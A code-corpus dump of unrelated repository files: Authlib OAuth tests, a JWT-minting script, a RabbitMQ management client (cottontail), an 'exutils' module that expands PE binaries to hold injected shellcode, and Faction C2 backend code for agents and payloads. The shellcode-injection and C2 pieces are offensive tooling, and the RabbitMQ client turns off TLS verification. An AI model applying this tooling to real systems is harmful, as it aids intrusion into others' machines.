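        if token_type_hint == 'refresh_token':
            return Token.query_by_refresh_token(token, client.client_id)
        return (Token.query_by_access_token(token, client.client_id) or
                Token.query_by_refresh_token(token, client.client_id))

    def revoke_token(self, token):
        token.revoked = True  # mark revoked rather than delete (see docstring)
        session.add(token)
        session.commit()

# server.register_endpoint(MyRevocationEndpoint)
```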
#### File: django/test_oauth1/test_token_credentials.py
```python
import time
from authlib.specs.rfc5849 import signature
from tests.util import read_file_path, decode_response
from django.test import override_settings
from django.core.cache import cache
from .models import User, Client
from .oauth1_server import TestCase
class AuthorizationTest(TestCase):
def prepare_data(self):
user = User(username='foo')
user.save()
client = Client(
user_id=user.pk,
client_id='client',
client_secret='secret',
default_redirect_uri='https://a.b',
)
client.save()
def prepare_temporary_credential(self, server):
token = {
'oauth_token': 'abc',
'oauth_token_secret': 'abc-secret',
'oauth_verifier': 'abc-verifier',
'client_id': 'client',
'user_id': 1
}
key_prefix = server._temporary_credential_key_prefix
key = key_prefix + token['oauth_token']
cache.set(key, token, timeout=server._temporary_expires_in)
def test_invalid_token_request_parameters(self):
self.prepare_data()
server = self.create_server()
url = '/oauth/token'
# case 1
request = self.factory.post(url)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'missing_required_parameter')
self.assertIn('oauth_consumer_key', data['error_description'])
# case 2
request = self.factory.post(url, data={'oauth_consumer_key': 'a'})
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'invalid_client')
# case 3
request = self.factory.post(url, data={'oauth_consumer_key': 'client'})
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'missing_required_parameter')
self.assertIn('oauth_token', data['error_description'])
# case 4
request = self.factory.post(url, data={
'oauth_consumer_key': 'client',
'oauth_token': 'a'
})
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'invalid_token')
def test_duplicated_oauth_parameters(self):
self.prepare_data()
server = self.create_server()
url = '/oauth/token?oauth_consumer_key=client'
request = self.factory.post(url, data={
'oauth_consumer_key': 'client',
'oauth_token': 'abc',
'oauth_verifier': 'abc'
})
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'duplicated_oauth_protocol_parameter')
@override_settings(
AUTHLIB_OAUTH1_PROVIDER={'signature_methods': ['PLAINTEXT']})
def test_plaintext_signature(self):
self.prepare_data()
server = self.create_server()
url = '/oauth/token'
# case 1: success
self.prepare_temporary_credential(server)
auth_header = (
'OAuth oauth_consumer_key="client",'
'oauth_signature_method="PLAINTEXT",'
'oauth_token="abc",'
'oauth_verifier="abc-verifier",'
'oauth_signature="secret&abc-secret"'
)
request = self.factory.post(url, HTTP_AUTHORIZATION=auth_header)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertIn('oauth_token', data)
# case 2: invalid signature
self.prepare_temporary_credential(server)
request = self.factory.post(url, data={
'oauth_consumer_key': 'client',
'oauth_signature_method': 'PLAINTEXT',
'oauth_token': 'abc',
'oauth_verifier': 'abc-verifier',
'oauth_signature': 'invalid-signature'
})
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'invalid_signature')
def test_hmac_sha1_signature(self):
self.prepare_data()
server = self.create_server()
url = '/oauth/token'
params = [
('oauth_consumer_key', 'client'),
('oauth_token', 'abc'),
('oauth_verifier', 'abc-verifier'),
('oauth_signature_method', 'HMAC-SHA1'),
('oauth_timestamp', str(int(time.time()))),
('oauth_nonce', 'hmac-sha1-nonce'),
]
base_string = signature.construct_base_string(
'POST', 'http://testserver/oauth/token', params
)
sig = signature.hmac_sha1_signature(
base_string, 'secret', 'abc-secret')
params.append(('oauth_signature', sig))
auth_param = ','.join(['{}="{}"'.format(k, v) for k, v in params])
auth_header = 'OAuth ' + auth_param
# case 1: success
self.prepare_temporary_credential(server)
request = self.factory.post(url, HTTP_AUTHORIZATION=auth_header)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertIn('oauth_token', data)
        # case 2: nonce already used
self.prepare_temporary_credential(server)
request = self.factory.post(url, HTTP_AUTHORIZATION=auth_header)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'invalid_nonce')
@override_settings(
AUTHLIB_OAUTH1_PROVIDER={'signature_methods': ['RSA-SHA1']})
def test_rsa_sha1_signature(self):
self.prepare_data()
server = self.create_server()
url = '/oauth/token'
self.prepare_temporary_credential(server)
params = [
('oauth_consumer_key', 'client'),
('oauth_token', 'abc'),
('oauth_verifier', 'abc-verifier'),
('oauth_signature_method', 'RSA-SHA1'),
('oauth_timestamp', str(int(time.time()))),
('oauth_nonce', 'rsa-sha1-nonce'),
]
base_string = signature.construct_base_string(
'POST', 'http://testserver/oauth/token', params
)
sig = signature.rsa_sha1_signature(
base_string, read_file_path('rsa_private.pem'))
params.append(('oauth_signature', sig))
auth_param = ','.join(['{}="{}"'.format(k, v) for k, v in params])
auth_header = 'OAuth ' + auth_param
request = self.factory.post(url, HTTP_AUTHORIZATION=auth_header)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertIn('oauth_token', data)
# case: invalid signature
self.prepare_temporary_credential(server)
auth_param = auth_param.replace('rsa-sha1-nonce', 'alt-sha1-nonce')
auth_header = 'OAuth ' + auth_param
request = self.factory.post(url, HTTP_AUTHORIZATION=auth_header)
resp = server.create_token_response(request)
data = decode_response(resp.content)
self.assertEqual(data['error'], 'invalid_signature')
```
#### File: flask/test_oauth2/test_token_revocation.py
```python
from flask import json
from authlib.flask.oauth2.sqla import create_revocation_endpoint
from .models import db, User, Client, Token
from .oauth2_server import TestCase
from .oauth2_server import create_authorization_server
RevocationEndpoint = create_revocation_endpoint(db.session, Token)
class RevokeTokenTest(TestCase):
def prepare_data(self):
server = create_authorization_server(self.app)
server.register_endpoint(RevocationEndpoint)
user = User(username='foo')
db.session.add(user)
db.session.commit()
client = Client(
user_id=user.id,
client_id='revoke-client',
client_secret='revoke-secret',
redirect_uri='http://localhost/authorized',
scope='profile',
)
db.session.add(client)
db.session.commit()
def create_token(self):
token = Token(
user_id=1,
client_id='revoke-client',
token_type='bearer',
access_token='a1',
refresh_token='r1',
scope='profile',
expires_in=3600,
)
db.session.add(token)
db.session.commit()
def test_invalid_client(self):
self.prepare_data()
rv = self.client.post('/oauth/revoke')
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_client')
headers = {'Authorization': 'invalid token_string'}
rv = self.client.post('/oauth/revoke', headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_client')
headers = self.create_basic_header(
'invalid-client', 'revoke-secret'
)
rv = self.client.post('/oauth/revoke', headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_client')
headers = self.create_basic_header(
'revoke-client', 'invalid-secret'
)
rv = self.client.post('/oauth/revoke', headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_client')
def test_invalid_token(self):
self.prepare_data()
headers = self.create_basic_header(
'revoke-client', 'revoke-secret'
)
rv = self.client.post('/oauth/revoke', headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_request')
rv = self.client.post('/oauth/revoke', data={
'token': 'invalid-token',
}, headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_request')
rv = self.client.post('/oauth/revoke', data={
'token': 'a1',
'token_type_hint': 'unsupported_token_type',
}, headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'unsupported_token_type')
rv = self.client.post('/oauth/revoke', data={
'token': 'a1',
'token_type_hint': 'refresh_token',
}, headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_request')
def test_revoke_token_with_hint(self):
self.prepare_data()
self.create_token()
headers = self.create_basic_header(
'revoke-client', 'revoke-secret'
)
rv = self.client.post('/oauth/revoke', data={
'token': 'a1',
'token_type_hint': 'access_token',
}, headers=headers)
self.assertEqual(rv.status_code, 200)
rv = self.client.post('/oauth/revoke', data={
'token': 'a1',
'token_type_hint': 'access_token',
}, headers=headers)
resp = json.loads(rv.data)
self.assertEqual(resp['error'], 'invalid_request')
def test_revoke_token_without_hint(self):
self.prepare_data()
self.create_token()
headers = self.create_basic_header(
'revoke-client', 'revoke-secret'
)
rv = self.client.post('/oauth/revoke', data={
'token': 'a1',
}, headers=headers)
self.assertEqual(rv.status_code, 200)
``` |
{
"source": "3lpsy/boucan-compose",
"score": 3
} |
#### File: 3lpsy/boucan-compose/makejwt.py
```python
from datetime import timedelta, datetime
import argparse
import uuid
import sys
from os import environ
import jwt
if not getattr(jwt, "encode", None):
print(
"JWT Module does not have the 'encode' method. This is probably the wrong jwt module. You need pyjwt: pip install pyjwt"
)
sys.exit(1)
NODE_SCOPES = "profile dns-request:create dns-request:list http-request:create http-request:list zone:list zone:read refresh api-token:syncable"
def create_token(*, secret: str, data: dict, expire: datetime):
    to_encode = data.copy()
    to_encode.update({"exp": expire})
    encoded_jwt = jwt.encode(to_encode, secret, algorithm="HS256")
    # PyJWT 1.x returns bytes while 2.x returns str; normalize to str
    if isinstance(encoded_jwt, bytes):
        encoded_jwt = encoded_jwt.decode()
    return encoded_jwt
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-S",
"--secret",
action="store",
type=str,
help=f"api secret (alternative use API_SECRET environemnt variable)",
)
parser.add_argument(
"-u", "--user-id", action="store", default=1, type=str, help="user id (sub)"
)
parser.add_argument(
"-s",
"--scope",
action="append",
type=str,
help=f"scopes (default: {NODE_SCOPES})",
)
parser.add_argument(
"-d", "--days", action="store", default=30, type=int, help="days valid for"
)
parser.add_argument(
"-n",
"--server-name",
action="store",
type=str,
help="dns/http server name (aaa-bbb-ccc)",
)
parser.add_argument(
"-e",
"--exportformat",
action="store_true",
help="prints the commands to export HTTP_API_SECRET and DNS_API_SECRET",
)
args = parser.parse_args()
data = {"sub": args.user_id}
scopes = " ".join(args.scope) if len(args.scope or []) > 0 else NODE_SCOPES
data["scopes"] = scopes
server_name = args.server_name
if server_name:
data["dns_server_name"] = server_name
data["http_server_name"] = server_name
expires_delta = timedelta(days=args.days)
expires_at = datetime.utcnow() + expires_delta
secret = args.secret or environ.get("API_SECRET")
if not secret:
print(
"No secret provided using -S/--secret or API_SECRET. Please provide one that matches the server and try again"
)
sys.exit(1)
    token = create_token(secret=secret, data=data, expire=expires_at)
if args.exportformat:
print(f"export HTTP_API_TOKEN={str(token)}")
print(f"export DNS_API_TOKEN={str(token)}")
else:
print("TOKEN:{}".format(str(token)))
``` |
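The same token can also be produced programmatically by calling create_token() directly; a hedged sketch (the secret, subject, and lifetime below are placeholder values):
```python
from datetime import datetime, timedelta

# Hedged sketch: calling create_token() from makejwt.py directly.
token = create_token(
    secret="supersecret",                       # placeholder secret
    data={"sub": 1, "scopes": NODE_SCOPES},     # placeholder subject
    expire=datetime.utcnow() + timedelta(days=30),
)
print("TOKEN:{}".format(token))
```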
{
"source": "3lpsy/cottontail",
"score": 3
} |
#### File: cottontail/cottontail/rabbitmq_management.py
```python
try:
from urllib.parse import quote
except ImportError:
from urllib import quote
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class UnauthorizedAccessException(Exception):
"""Custom exception for HTTP 401"""
pass
class RabbitMQManagementClient(object):
"""rabbitmq-management HTTP API client.
Attributes:
host (str): server host
    port (int, optional): server port
username (str, optional): account's username
password (str, optional): account's password
"""
def __init__(self, host, port=15672, username="guest", password="<PASSWORD>",\
ssl=False):
"""Constructor
Note:
Do not include the `self` parameter in the ``Args`` section.
Args:
host (str): server host
port (int, optional): servver port
username (str, optional): account's username
password (str, optional): account's password
"""
self._host = host
self._port = port
self._username = username
self._password = password
self._scheme = "https" if ssl else "http"
def get_request(self, path):
"""Wrapper for GET requests to the API.
Args:
path (str): REST path appended to /api
Returns:
HTTP response JSON object.
Raises:
UnauthorizedException
"""
response = requests.get(
"{}://{}:{}/api/{}".format(self._scheme, self._host, self._port, path),
auth=(self._username, self._password),
verify=False,
timeout=5
)
if response.status_code == 200:
return response.json()
elif response.status_code == 401 or response.status_code == 403:
raise UnauthorizedAccessException(
"Authorization error: can't access /api/{}".format(path))
elif response.status_code == 404:
return None
else:
raise Exception("An error occured")
def post_request(self, path, data):
"""Wrapper for POST requests to the API
Args:
path (str): REST path appended to /api
data (object): POST body
Returns:
HTTP response JSON object
Raises:
UnauthorizedException
"""
response = requests.post(
"{}://{}:{}/api/{}".format(self._scheme, self._host, self._port, path),
auth=(self._username, self._password),
json=data,
verify=False
)
if response.status_code == 200:
return response.json()
elif response.status_code == 401 or response.status_code == 403:
raise UnauthorizedAccessException(
"Authorization error: can't access /api/{}".format(path))
else:
raise Exception("An error occured")
def get_amqp_listeners(self):
"""
Request the API for AMQP listeners.
"""
overview = self.get_overview()
return [l for l in overview["listeners"] if "amqp" in l["protocol"]]
def get_overview(self):
"""
Various random bits of information that describe the whole system.
"""
return self.get_request("overview")
def get_cluster_name(self):
"""
Name identifying this RabbitMQ cluster.
"""
return self.get_request("cluster-name")
def get_nodes(self):
"""
A list of nodes in the RabbitMQ cluster.
"""
return self.get_request("nodes")
def get_node(self, name, memory=False, binary=False):
"""
An individual node in the RabbitMQ cluster.
"""
return self.get_request("nodes/{}?memory={}&binary={}".format(
name, str(memory).lower(), str(binary).lower()))
def get_definitions(self, vhost=None):
"""
The server definitions - exchanges, queues, bindings, users,
virtual hosts, permissions and parameters.
Everything apart from messages.
"""
if vhost is not None:
return self.get_request("definitions/{}".format(
quote(vhost, safe='')))
return self.get_request("definitions")
def get_connections(self, vhost=None):
"""
A list of all open connections.
"""
if vhost is not None:
return self.get_request("vhosts/{}/connections".format(
quote(vhost, safe='')))
return self.get_request("connections")
def get_connection(self, name):
"""
An individual connection.
"""
return self.get_request("connections/{}".format(name))
def get_channels(self, vhost=None):
"""
A list of all open channels.
"""
if vhost is not None:
return self.get_request("vhosts/{}/channels".format(
quote(vhost, safe='')))
return self.get_request("channels")
def get_channel(self, name):
"""
Details about an individual channel.
"""
return self.get_request("channels/{}".format(name.replace(" ", "%20")))
def get_consumers(self, vhost=None):
"""
A list of all consumers (in a given vhosts).
"""
if vhost is not None:
return self.get_request("consumers/{}".format(
quote(vhost, safe='')))
return self.get_request("consumers")
def get_exchanges(self, vhost=None):
"""
A list of all exchanges (in a given vhost).
"""
if vhost is not None:
return self.get_request("exchanges/{}".format(
quote(vhost, safe='')))
return self.get_request("exchanges")
def get_exchange(self, vhost, name):
"""
An individual exchange.
"""
return self.get_request("exchanges/{}/{}".format(
quote(vhost, safe=''), name))
def get_queues(self, vhost=None):
"""
A list of all queues.
"""
if vhost is not None:
return self.get_request("queues/{}".format(quote(vhost, safe='')))
return self.get_request("queues")
def get_queue(self, vhost, name):
"""
An individual queue.
"""
return self.get_request("queue/{}/{}".format(vhost, name))
def get_messages(self, vhost, queue, count=10, requeue=True):
"""
Get messages currently stored in queue.
"""
return self.post_request(
"queues/{}/{}/get".format(quote(vhost, safe=''), queue),
{
"count": count,
"encoding": "auto",
"name": queue,
"requeue": str(requeue).lower(),
"vhost": vhost
}
)
def get_bindings(self, vhost=None):
"""
A list of all bindings (in a given virtual host).
"""
if vhost is not None:
return self.get_request("bindings/{}".format(
quote(vhost, safe='')))
return self.get_request("bindings")
def get_vhosts(self):
"""
A list of all vhosts.
"""
return self.get_request("vhosts")
def get_vhost(self, name):
"""
An individual virtual host.
"""
return self.get_request("vhosts/{}".format(quote(name, safe='')))
def get_permissions(self, name=None, username=None):
"""
A list of all permissions.
"""
if name is None:
return self.get_request("permissions")
else:
if username is None:
return self.get_request("permissions/{}".format(quote(name, safe='')))
else:
return self.get_request("permissions/{}/{}".format(
quote(name, safe=''), quote(username, safe='')))
def get_users(self):
"""
A list of all users.
"""
return self.get_request("users")
def get_user(self, name):
"""
An individual user.
"""
return self.get_request("users/{}".format(name))
def whoami(self):
"""
Details of the currently authenticated user.
"""
return self.get_request("whoami")
``` |
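A hedged usage sketch of the client above (the host and credentials are hypothetical placeholders):
```python
# Hedged sketch: host and credentials are placeholder values.
client = RabbitMQManagementClient("10.0.0.5", username="guest", password="guest")
print(client.whoami())  # details of the authenticated user
for vhost in client.get_vhosts():
    # list the queues visible in each virtual host
    print(vhost["name"], client.get_queues(vhost["name"]))
```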
{
"source": "3lpsy/exutils",
"score": 3
} |
#### File: exutils/cli/expand.py
```python
import sys
from typing import List, Any
from argparse import ArgumentParser, Namespace, _SubParsersAction
from pathlib import Path
from os.path import join
from utils import shellcode_encoder
from cli.enums import SHELLCODE_HELP
from inject import Injector
def run(args: List[Any]):
# when only length is specified, shellcode is stubbed
injector = Injector(args["shellcode"], args["file"], args["output"], {})
injector.setup()
shellcode_size = injector.shellcode.get_final_size()
print("-- Expanding File --")
expanded_size = injector.output.expand_for_sc(
shellcode_size, injector.manager.file_alignment()
)
print(
f"[*] Finished: Output {injector.output} expanded by {shellcode_size} ({expanded_size} actual) bytes"
)
def apply(subparser: _SubParsersAction) -> ArgumentParser:
parser = subparser.add_parser("expand", help="expand binary (creates a copy)")
parser.add_argument("-s", "--shellcode", type=str, help=SHELLCODE_HELP)
parser.add_argument(
"-l",
"--length",
type=int,
help="instead of passing in shellcode, just pass in the length",
)
parser.add_argument(
"-f", "--file", type=str, help="path to source pe file", required=True
)
parser.add_argument(
"-o", "--output", type=str, help="path to newly created pe file"
)
parser.add_argument(
"-F",
"--force",
action="store_true",
help="force overwrite output",
default=False,
)
return parser
def normalize(args: Namespace) -> dict:
items = vars(args)
if args.shellcode:
items["shellcode"] = shellcode_encoder(items["shellcode"])
items["length"] = len(items["shellcode"])
elif args.length:
items["shellcode"] = b"\x00" * args.length
items["length"] = args.length
else:
print("[!] Please either pass in shellcode (-s) or length (-l)")
sys.exit(1)
p_file = Path(items["file"])
if not p_file.is_file():
print(f"[!] File not found at {items['file']}")
sys.exit(1)
items["file"] = p_file
if not args.output or Path(args.output).is_dir():
        if args.output and Path(args.output).is_dir():
parent = args.output
else:
parent = p_file.parent
parts = p_file.name.split(".")
if len(parts) > 1:
output = (
"".join(parts[: len(parts) - 1]) + "-injected." + parts[len(parts) - 1]
)
else:
output = p_file.name + "-injected"
items["output"] = join(parent, output)
if items["output"] in ["stdout", "/proc/self/fd/1"]:
print("[!] Writing to stdout not supported")
sys.exit(1)
p_output = Path(items["output"])
if p_output.is_file() and not items["force"]:
print("[!] Output file already exists. Delete it or use '--force' to overwrite")
sys.exit(1)
items["output"] = p_output
return items
``` |
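This module only defines the subcommand; a hedged sketch of how apply()/normalize()/run() might be wired in the CLI entry point (the dispatch below is an assumption, not taken from this file):
```python
# Hedged sketch of a CLI entry point; the dispatch is an assumption.
from argparse import ArgumentParser

def main():
    parser = ArgumentParser(prog="exutils")
    sub = parser.add_subparsers(dest="command", required=True)
    apply(sub)            # registers the "expand" subcommand defined above
    args = parser.parse_args()
    run(normalize(args))  # validate paths/shellcode, then expand the PE

if __name__ == "__main__":
    main()
```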
{
"source": "3lpsy/FactionAPI",
"score": 2
} |
#### File: apis/rest/error_message.py
```python
from flask import jsonify, request, send_file
from flask_restful import Resource, reqparse
from processing.user_role import authorized_groups
from processing.error_message import new_error_message, get_error_message
error_message_parser = reqparse.RequestParser()
error_message_parser.add_argument('Name')
error_message_parser.add_argument('Message')
class ErrorMessageEndpoint(Resource):
@authorized_groups(['StandardRead'])
def get(self, error_message_id='all'):
result = get_error_message(error_message_id)
if result['Success']:
return jsonify(result)
        return jsonify(result), 400
@authorized_groups(['StandardWrite'])
def post(self):
args = error_message_parser.parse_args()
result = new_error_message(args["Name"], args["Message"])
if result['Success']:
return jsonify(result)
        return jsonify(result), 400
```
#### File: FactionAPI/models/agent_type_version.py
```python
from backend.database import db
class AgentTypeVersion(db.Model):
__tablename__ = "AgentTypeVersion"
Id = db.Column(db.Integer, primary_key=True)
Name = db.Column(db.String)
AgentTypeId = db.Column(db.Integer, db.ForeignKey('AgentType.Id'), nullable=False)
Payloads = db.relationship('Payload', backref='AgentTypeVersion', lazy=True)
def __repr__(self):
if self.Name:
return '<AgentTypeVersion: %s>' % self.Name
else:
return '<AgentTypeVersion: %s>' % str(self.Id)
```
#### File: FactionAPI/models/error_message.py
```python
from backend.database import db
class ErrorMessage(db.Model):
__tablename__ = "ErrorMessage"
Id = db.Column(db.Integer, primary_key=True)
Source = db.Column(db.String)
Message = db.Column(db.String)
Details = db.Column(db.String)
Timestamp = db.Column(db.DateTime)
def __repr__(self):
return '<ErrorMessage: {0} - {1}>'.format(self.Source, self.Message)
```
#### File: FactionAPI/models/user.py
```python
import base64
import bcrypt
import pickle
from datetime import datetime
from flask import g
from flask.sessions import SecureCookieSessionInterface
from flask_login import user_loaded_from_header, user_loaded_from_request
from logger import log
from backend.database import db
from backend.cache import cache
from flask import jsonify
from flask_login import LoginManager
from models.api_key import ApiKey
from models.console_message import ConsoleMessage
login_manager = LoginManager()
class User(db.Model):
__tablename__ = "User"
Id = db.Column(db.Integer, primary_key=True)
Username = db.Column(db.String, unique=True)
Password = db.Column(db.LargeBinary)
RoleId = db.Column(db.Integer, db.ForeignKey('UserRole.Id'), nullable=False)
ApiKeys = db.relationship("ApiKey", backref='User', lazy=True)
Authenticated = db.Column(db.Boolean, default=False)
ConsoleMessages = db.relationship("ConsoleMessage", backref='User', lazy=True)
Files = db.relationship("FactionFile", backref='User', lazy=True)
Created = db.Column(db.DateTime)
LastLogin = db.Column(db.DateTime)
Enabled = db.Column(db.Boolean)
Visible = db.Column(db.Boolean)
def is_active(self):
"""True, as all users are active."""
return True
def get_id(self):
"""Return the email address to satisfy Flask-Login's requirements."""
return self.Username
def is_authenticated(self):
"""Return True if the user is authenticated."""
return self.Authenticated
def is_anonymous(self):
"""False, as anonymous users aren't supported."""
return False
def change_password(self, current_password, new_password):
log("change_password", "Got password change request")
if bcrypt.checkpw(current_password.encode('utf-8'), self.Password) and self.Enabled:
self.Password = bcrypt.hashpw(new_password.encode('utf-8'), bcrypt.gensalt())
db.session.add(self)
db.session.commit()
log("change_password", "<PASSWORD>")
return dict({
"Success": True,
"Message": 'Changed password for user: {0}'.format(self.Username)
})
log("change_password", "Current password incorrect")
return {
'Success':False,
'Message':'Invalid username or password.'
}
def get_api_keys(self):
api_keys = self.ApiKeys
log("get_api_keys", "Got api keys: {0}".format(str(api_keys)))
results = []
for api_key in api_keys:
result = dict()
result['Id'] = api_key.Id
result['Name'] = api_key.Name
result['Created'] = None
result['LastUsed'] = None
result['Type'] = api_key.Type
if api_key.Created:
result['Created'] = api_key.Created.isoformat()
if api_key.LastUsed:
result['LastUsed'] = api_key.LastUsed.isoformat()
results.append(result)
return {
'Success':True,
'Results':results
}
def delete_api_key(self, api_key_id):
api_keys = self.ApiKeys
for api_key in api_keys:
if api_key.Id == api_key_id:
db.session.delete(api_key)
db.session.commit()
return {
'Success':True,
'Message':"Api Key {0} deleted".format(api_key.Name)
}
return {
'Success':False,
'Message':"Api Key ID: {0} not found".format(api_key_id)
}
class ApiSessionInterface(SecureCookieSessionInterface):
# Taken from https://flask-login.readthedocs.io/en/latest/#disabling-session-cookie-for-apis
    # I believe this is the proper way to do this since we're an API and
    # don't care about session cookies.
def open_session(self, app, request):
s = self.get_signing_serializer(app)
if s is None:
return None
else:
return self.session_class()
def should_set_cookie(self, app, session):
return False
def save_session(self, *args, **kwargs):
log("user model", "save session called")
return
@login_manager.user_loader
def user_loader(user_id):
"""Given *user_id*, return the associated User object.
:param unicode user_id: user_id (email) user to retrieve
"""
log("user_loader", "Called for user_id: {0}".format(user_id))
"""Load user by ID from cache, if not in cache, then cache it."""
# make a unique cache key for each user
user_key = 'user_{}'.format(user_id)
# check if the user_object is cached
user_obj = pickle.loads(cache.get(user_key)) if cache.get(user_key) else None
if user_obj:
return user_obj
elif isinstance(user_id, int):
user = User.query.get(user_id)
user_obj = pickle.dumps(user)
cache.set(user_key, user_obj, timeout=3600)
return user
else:
user = User.query.filter_by(Username = user_id).first()
user_obj = pickle.dumps(user)
cache.set(user_key, user_obj, timeout=3600)
return user
# handlers renamed so they do not shadow the imported signal objects
@user_loaded_from_header.connect
def on_user_loaded_from_header(self, user=None):
    log("user model", "User loaded from header")
    g.login_via_header = True
@user_loaded_from_request.connect
def on_user_loaded_from_request(self, user=None):
    log("user model", "User loaded from request")
    g.login_via_request = True
@login_manager.request_loader
def load_user_from_request(request):
    # try cookie credentials first, then the Basic Auth header, then a token query parameter
print('Trying API key lookup')
keyid = None
secret = None
try:
keyid = request.cookies['AccessKeyId']
secret = request.cookies['AccessSecret']
except:
pass
try:
auth_header = request.headers.get('Authorization')
auth_type, credentials = auth_header.split(' ')
decoded_header = base64.b64decode(credentials).decode("utf-8")
keyid, secret = decoded_header.split(':')
except:
pass
try:
token = request.args.get('token')
keyid, secret = token.split(':')
except:
pass
if secret and keyid:
print('Got API KEY: {0}'.format(keyid))
apiKey = ApiKey.query.filter_by(Name=keyid).first()
if apiKey and apiKey.Enabled:
if bcrypt.checkpw(secret.encode('utf-8'), apiKey.Key):
print('Returning User with Id: {0}'.format(str(apiKey.UserId)))
apiKey.LastUsed = datetime.utcnow()
db.session.add(apiKey)
user = User.query.get(apiKey.UserId)
user.LastLogin = datetime.utcnow()
db.session.add(user)
db.session.commit()
return user
db.session.remove()
else:
print('Invalid API Key or Secret')
db.session.remove()
# finally, return None if both methods did not login the user
db.session.remove()
return None
```
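load_user_from_request() above accepts credentials three ways: AccessKeyId/AccessSecret cookies, a base64-encoded keyid:secret Authorization header, or a `token` query parameter. A hedged sketch of the header variant (key id, secret, and URL are hypothetical):
```python
# Hedged sketch: authenticating with the Authorization header parsed above.
# Key id, secret, and URL are placeholder values.
import base64
import requests

keyid, secret = "mykey", "mysecret"
credentials = base64.b64encode("{}:{}".format(keyid, secret).encode()).decode()
resp = requests.get(
    "https://faction.example/api/v1/errormessage/",  # hypothetical endpoint
    headers={"Authorization": "Basic {}".format(credentials)},
)
```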
#### File: FactionAPI/processing/console_message.py
```python
from datetime import datetime
import json
import re
from flask_login import current_user
from models.console_message import ConsoleMessage
from models.agent import Agent
from models.agent_task import AgentTask
from models.user import User
from backend.rabbitmq import rabbit_producer
from processing.faction_file import get_faction_file_bytes
from logger import log
def console_message_json(message):
if (message.UserId):
user = User.query.get(message.UserId)
username = user.Username
elif (message.AgentId):
agent = Agent.query.get(message.AgentId)
username = agent.Name
else:
username = None
result = dict(
{
'AgentId': message.AgentId,
'UserId': message.UserId,
'Username' : username,
'Content' : message.Content,
'Display': message.Display,
'Type': message.Type,
'Received' : message.Received.isoformat()
})
return result
def new_console_message(agent_id, content):
filenames = re.findall("(f2:files/[^\s]+)", content)
display = content
if len(filenames) > 0:
for filename in filenames:
name = filename.replace("f2:files/","")
log("new_console_message", "getting bytes for file {0}".format(name))
result = get_faction_file_bytes(name)
if result['Success']:
content = content.replace(filename, result['Message'])
else:
return dict({
'Success': False,
'Message': 'Could not find file: {0}'.format(filename)
})
console_message = {
"AgentId": agent_id,
"UserId": current_user.Id,
"Content": content,
"Display": display
}
log("add_message", "publishing message: {0}".format(console_message))
rabbit_producer.send_request('NewConsoleMessage', console_message)
return console_message
def get_console_message(console_message_id):
if console_message_id == 'all':
result = []
console_messages = ConsoleMessage.query.all()
for console_message in console_messages:
result.append(console_message_json(console_message))
else:
console_message = ConsoleMessage.query.get(console_message_id)
result = console_message_json(console_message)
return result
def get_console_messages_by_agent(agent_id):
agent = Agent.query.get(agent_id)
if agent:
console_messages = ConsoleMessage.query.filter_by(AgentId=agent_id)
results = []
for message in console_messages:
results.append(console_message_json(message))
return {
"Success": True,
"Results": results
}
else:
return {
"Success": False,
"Message": "No agent found with id: {0}".format(agent_id)
}
def get_console_message_by_task(agent_task_id):
    task = AgentTask.query.get(agent_task_id)
    if task:
        console_messages = ConsoleMessage.query.filter_by(AgentTaskId=agent_task_id)
        results = []
        for message in console_messages:
            log("get_console_message_by_task", "Working on: {0}".format(message))
            results.append(console_message_json(message))
        # return an empty Results list when the task has no messages instead
        # of falling through and returning None
        return {
            "Success": True,
            "Results": results
        }
    else:
        return {
            "Success": False,
            "Message": "No task found with id: {0}".format(agent_task_id)
        }
``` |
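new_console_message() above lets operators reference server-side files inline. A hedged sketch (the agent id and file name are hypothetical):
```python
# Hedged sketch: agent id and file name are placeholder values.
msg = new_console_message(
    agent_id=7,
    content="upload f2:files/payload.bin /tmp/payload.bin",
)
# Every f2:files/<name> token is swapped for the file contents returned by
# get_faction_file_bytes() before the message is published to RabbitMQ,
# while the Display field keeps the original, human-readable text.
```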
{
"source": "3lpsy/jubilant-market",
"score": 2
} |
#### File: jubilant-market/PythonServer/wsgi.py
```python
from flask import Flask, request, jsonify, url_for, Blueprint, render_template, send_from_directory, current_app, session
from flask_restful import Api, Resource, reqparse, abort
from web3 import Web3
from decouple import config
from flask_cors import CORS, cross_origin
# Initialize Flask App
# Each API call is for the functionality of the React front end
# or for initializing the Solidity SmartContract
app = Flask(__name__)
cors = CORS(app)
api = Api(app)
# functions
def abort_if_useraddr_doesnt_exist(userAddress):
if userAddress not in users:
abort(404, message=" Could not find userAddress")
def abort_if_userAddr_exists(userAddress):
if userAddress in users:
abort(409, message="UserAddress already exist")
# MetaMask Chain Id
# # Hex Decimal Network
# 0x1 1 Ethereum Main Network (Mainnet)
# 0x3 3 Ropsten Test Network
# 0x4 4 Rinkeby Test Network
# 0x5 5 Goerli Test Network
# 0x2a 42 Kovan Test Network
user_put_args = reqparse.RequestParser()
user_put_args.add_argument("userAddress", type=str, help="UserAddress Require", required=True)
user_put_args.add_argument("account_total", type=int, help="account_total Require", required=True)
user_put_args.add_argument("latest_month", type=int, help="latest_month Require", required=True)
